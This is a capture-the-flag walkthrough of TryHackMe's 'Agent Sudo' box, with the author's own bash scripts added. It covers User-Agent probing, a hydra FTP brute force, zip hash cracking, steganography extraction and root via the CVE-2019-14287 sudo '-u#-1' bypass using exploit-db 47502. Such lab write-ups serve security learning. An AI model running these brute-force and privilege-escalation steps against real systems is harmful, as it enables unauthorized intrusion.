Agent Sudo, so cute. Let's deploy and hack!
After deploying, I again set an environment variable TARGET for the target box so I don't have to keep the IP in my head.
$ export TARGET=10.10.10.177
Author note
#Deploy the machine
answer: No answer needed
Enumerate
#How many open ports?
answer: 3
As usual, nmap to kick off the show:
$ nmap -sV -sC $TARGET
#How you redirect yourself to a secret page?
answer: user-agent
Visiting the site on the target IP lands us on:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
Up until now I still have no idea what my agent codename is. Looking at the hint format xxxx-xxxxx, I tried my luck. Bingo! Now I know I need to set the User-Agent header to a custom value in order to get redirected.
#What is the agent name?
answer: Chris
I tried using ffuf to look for 301/302 responses by fuzzing the header (-H), but no luck: that wordlist is made of real browser strings, and the codename is not one of them.
$ ffuf -c -t 64 -w $W_USER_AGENT -u http://$TARGET -H "User-agent: FUZZ" -mc 301,302
$W_USER_AGENT = user-agent-whatismybrowserdotcom-large.txt
A look at the hint gave it away: use "user agent: C" (I typed the value in myself after selecting any of the choices)
and I got:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
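An added example, my own script rather than anything from the writeup or the room, that does the same probing with curl instead of ffuf and reports where each redirect points rather than just the status code. The target URL and the wordlist are arguments you supply; the example URLs in the comments are made up.

```shell
#!/usr/bin/env bash
# Added example, not the writeup's own tooling: send one request per candidate
# User-Agent, never follow redirects, and report only the values that redirect.
# Single-letter candidates (the hint format) can be generated with
#   printf '%s\n' {A..Z} > letters.txt

# Turn a probe result into a report line, but only when the status is 3xx.
# Prints nothing and returns 1 otherwise.
report_redirect() {
  local ua=$1 code=$2 location=$3
  case "$code" in
    3[0-9][0-9]) printf '%s -> %s %s\n' "$ua" "$code" "$location" ;;
    *) return 1 ;;
  esac
}

# Fetch URL with the given User-Agent (-A) and emit "<status> <Location target>".
# %{redirect_url} is what the server's Location header resolves to; -L is not
# used, so we see the redirect itself instead of the page behind it.
probe() {
  local url=$1 ua=$2
  curl -s -o /dev/null -A "$ua" -w '%{http_code} %{redirect_url}\n' "$url"
}

# Usage: ./ua_probe.sh http://$TARGET/ letters.txt   (one candidate per line)
main() {
  local url=$1 wordlist=$2 ua result code location
  while IFS= read -r ua; do
    [ -n "$ua" ] || continue
    result=$(probe "$url" "$ua")
    code=${result%% *}        # text before the first space
    location=${result#* }     # text after it (empty when there was no redirect)
    report_redirect "$ua" "$code" "$location" || true
  done < "$wordlist"
}

if [ "$#" -eq 2 ]; then main "$@"; fi
```

Only the redirecting values are printed, so on a quiet wordlist the output is the answer itself; keep the request rate modest, since every line is a full HTTP request.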
Hash cracking and brute-force
#FTP password
answer: [NO SPOILER]
Judging by Agent R's message, chris has a weak password. Let's brute-force FTP with hydra:
$ hydra -f -I -vV -t 64 -l chris -P $W_PASSWORD $TARGET ftp
$W_PASSWORD = rockyou.txt
Since we have the FTP credentials, let's log in and check it out!
$ ftp $TARGET
Then we found three files: To_agentJ.txt, cute-alien.jpg and cutie.png. Shall we download them all?
ftp> get To_agentJ.txt
ftp> get cute-alien.jpg
ftp> get cutie.png
Let’s look at the text file:
OK, looks like the images are not just images. The password should be hidden inside them!
Using binwalk I can check what is embedded in the images:
$ binwalk cute-alien.jpg
$ binwalk cutie.png
Let’s extract (-e) it out:
$ binwalk -e cutie.png
After extracting the data from the image we get a new folder, _cutie.png.extracted, containing a zip file, 8702.zip. So I unzip it with 7z:
$ 7z x 8702.zip
#Zip file password
answer: [NO SPOILER]
I knew it would not be easy. Let's crack the zip! But before that, I noticed the file inside the zip is To_agentR.txt, the same name as the 0-byte file binwalk extracted from the image. So I deleted the 0-byte file.
Using John the Ripper, we can crack it easily. First we need to get the hash out of the zip:
$ zip2john 8702.zip > zip.hashes
Despite the error output, we still got our hash. Now crack it with John (with no mode given it runs single, wordlist and incremental mode in turn) and extract one more time with the password it finds:
$ john zip.hashes
$ 7z x 8702.zip
Let’s examine the extracted file:
$ cat To_agentR.txt
#steg password
answer: [NO SPOILER]
Looks like there are more passwords to crack.
Agent C,
We need to send the picture to ‘XXXXXXXX’ as soon as possible!
By,
Agent R
I suspect the password is encoded rather than hashed. So I ran it through MultiEncoder.com: ROT-13, no luck; then base64, got it!
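As an added example (my own script, not part of the original writeup), the same two transforms can be tried locally with coreutils instead of a website, which also keeps a CTF token off someone else's server. The sample token is a constructed one (base64 of "supersecret"), not the room's real value.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: try ROT-13 and base64 on a short token and
# show only results that are printable text.

rot13() { printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Print "base64:<text>" and return 0 only if $1 is valid base64 that decodes to
# printable ASCII. Random bytes also decode "successfully", so filter those out.
try_base64() {
  local decoded
  decoded=$(printf '%s' "$1" | base64 -d 2>/dev/null) || return 1
  [ -n "$decoded" ] || return 1
  if printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]'; then
    return 1
  fi
  printf 'base64:%s\n' "$decoded"
}

# Run every candidate transform on one token. ROT-13 always "succeeds", so its
# result is shown for a human to judge; base64 is shown only when it decodes cleanly.
decode_candidates() {
  printf 'rot13:%s\n' "$(rot13 "$1")"
  try_base64 "$1" || true
}

# Constructed sample token, not the room's real value.
decode_candidates "c3VwZXJzZWNyZXQ="
```

Run it with any token in place of the sample; a real base64 string shows up as a second line, while a token that only looks encoded produces just the ROT-13 line.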
#Who is the other agent (in full name)?
answer: James
I spent quite some time here. Having the password from the base64, I didn't know where to use it. To be honest, I took a peek at MrSeth6797's writeup and realised what "send the picture" in the above message means: extract the hidden data from the other image (cute-alien.jpg), using that password as the steghide passphrase.
$ steghide extract -sf cute-alien.jpg
#SSH password
answer: [NO SPOILER]
Hi james,
Glad you find this message. Your login password is XXXXXXXXXXXX
Don’t ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
The password is within the same message.
Capture the user flag
#What is the user flag?
answer: [NO SPOILER]
Logging in with the username and password from the previous step, we have a shell!
$ ssh james@$TARGET
Let's examine user_flag.txt:
#What is the incident of the photo called?
answer: Roswell alien autopsy
The home folder also has another image file, so I downloaded it via scp:
$ scp james@$TARGET:/home/james/Alien_autospy.jpg ./
Searching Google for "alien autopsy" led me to the news story about the incident.
Privilege escalation
#CVE number for the escalation
answer: CVE-2019-14287
I checked what sudo lets my user run:
$ sudo -l
I am still just a beginner, so I tried searching cve.mitre.org for "BASH"-related CVEs.
I tried the first dozen CVEs with no luck and gave up on this. Another peek into the writeup led me to CVE-2019-14287. That bug, fixed in sudo 1.8.28, affects sudoers rules that allow a command as any user except root, written "(ALL, !root)": asking sudo for user ID -1 with "-u#-1" (or 4294967295) slips past the "!root" check and the command ends up running as root. With the CVE number I searched exploit-db and downloaded the Python file.
With the py file in hand I uploaded it to the TARGET /tmp/ folder:
$ scp ./47502.py james@$TARGET:/tmp
Then, back in the TARGET shell, I ran the file and got root:
$ python3 47502.py
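Before running someone else's exploit it is worth confirming the two preconditions of CVE-2019-14287 yourself. The script below is an added example of mine, not part of the writeup or of the exploit-db file; it assumes "sudo -l" prints an entry of the form "(ALL, !root) <command>", which is what the CVE requires, and it only prints the bypass command instead of running it.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup or exploit-db 47502: check the two
# preconditions of CVE-2019-14287 before reaching for the exploit.
#   1. sudo older than 1.8.28 (the upstream fix).
#   2. a sudoers entry of the form "(ALL, !root) <command>".
# When both hold, "sudo -u#-1 <command>" runs <command> as root, which is the
# whole trick the public exploit automates.

# Return 0 when a version string such as 1.8.27 or 1.8.21p2 is older than 1.8.28.
sudo_vulnerable() {
  local v=$1 IFS=.
  set -- $v
  local maj=${1:-0} min=${2:-0} pat=${3:-0} vuln=1
  pat=${pat%%p*}            # drop a "p2"-style suffix so the numeric test works
  if [ "$maj" -lt 1 ]; then vuln=0
  elif [ "$maj" -eq 1 ] && [ "$min" -lt 8 ]; then vuln=0
  elif [ "$maj" -eq 1 ] && [ "$min" -eq 8 ] && [ "$pat" -lt 28 ]; then vuln=0
  fi
  return "$vuln"
}

# Return 0 when the given "sudo -l" output grants a command as anyone but root.
rule_allows_bypass() {
  printf '%s\n' "$1" | grep -Eq '\(ALL, *!root\)'
}

# First line of "sudo --version" is "Sudo version 1.8.27"; return the number.
installed_sudo_version() {
  sudo --version | awk 'NR==1 {print $3}'
}

# Live check, only when invoked as "./check.sh --live" on the target.
if [ "${1:-}" = "--live" ]; then
  ver=$(installed_sudo_version)
  if ! sudo_vulnerable "$ver"; then
    echo "sudo $ver is 1.8.28 or newer: not affected by CVE-2019-14287"; exit 1
  fi
  if ! rule_allows_bypass "$(sudo -l 2>/dev/null)"; then
    echo "no (ALL, !root) rule for this user"; exit 1
  fi
  echo "looks vulnerable: run  sudo -u#-1 <command from the rule>  (e.g. sudo -u#-1 /bin/bash)"
fi
```

The version test is only a hint, since distributions backport fixes without bumping the version string; the "(ALL, !root)" rule is the real precondition, and the bypass only gives you the command that rule names, which is why the writeup's target had to grant a shell.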
#What is the root flag?
answer: [NO SPOILER]
The rest is the usual drill:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
By,
DesKel a.k.a Agent R
#(Bonus) Who is Agent R?
answer: Deskel